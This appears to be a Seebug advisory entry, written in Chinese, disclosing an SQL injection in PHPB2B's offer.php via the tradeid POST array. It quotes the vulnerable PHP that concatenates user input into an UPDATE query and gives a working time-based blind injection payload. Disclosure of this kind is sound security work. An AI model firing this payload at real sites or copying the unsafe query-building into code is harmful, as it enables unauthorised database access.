PHPB2B最新版Update注入

2015-02-16T00:00:00
ID SSV:95141
Type seebug
Reporter Root
Modified 2015-02-16T00:00:00

Description

简要描述:

RT

详细说明:

注入链接:/virtual-office/offer.php 注入参数:tradeid 漏洞代码:(第346行开始) if(isset($_POST['refresh'])){ if (!empty($_POST['refresh']) && !empty($_POST['tradeid'])) { $vals = array(); $pre_submittime = $pdb->GetOne("select max(submit_time) from {$tb_prefix}trades where member_id=".$the_memberid); if ($pre_submittime>($time_stamp-$tMaxDay*86400)) { flash("allow_refresh_day"); } $vals['submit_time'] = $time_stamp; $vals['expire_days'] = 10; $vals['expire_time'] = $time_stamp+(24*3600*$vals['expire_days']); $conditions[]= "status='1'"; $ids = implode(",", $_POST['tradeid']); $conditions[]= "id in (".$ids.")"; $condition = implode(" AND ", $conditions); $sql = "update ".$trade->getTable()." set submit_time=".$time_stamp.",expire_days=10,expire_time=".$vals['expire_time']." where ".$condition; $result = $pdb->Execute($sql); } } $ids = implode(",", $_POST['tradeid']);从前台获取post数组参数tradeid后直接使用implode函数分割后直接拼接sql语句导致Update注入漏洞。

漏洞证明:

``` 漏洞测试: http://127.0.0.1/phpb2b/virtual-office/offer.php Post: refresh=1&tradeid[]=1111)||if((length(user())=0),1,sleep(5))# 这里为了测试把注入的sql语句打印出来

[<img src="https://images.seebug.org/upload/201502/091043347bcf26026c8f2fa3535c7da3030d8c5e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091043347bcf26026c8f2fa3535c7da3030d8c5e.png)

Mysql日志:

[<img src="https://images.seebug.org/upload/201502/091043271c06b5a5be5618687358d5145a02f84c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091043271c06b5a5be5618687358d5145a02f84c.png)

成功执行延时注入 ```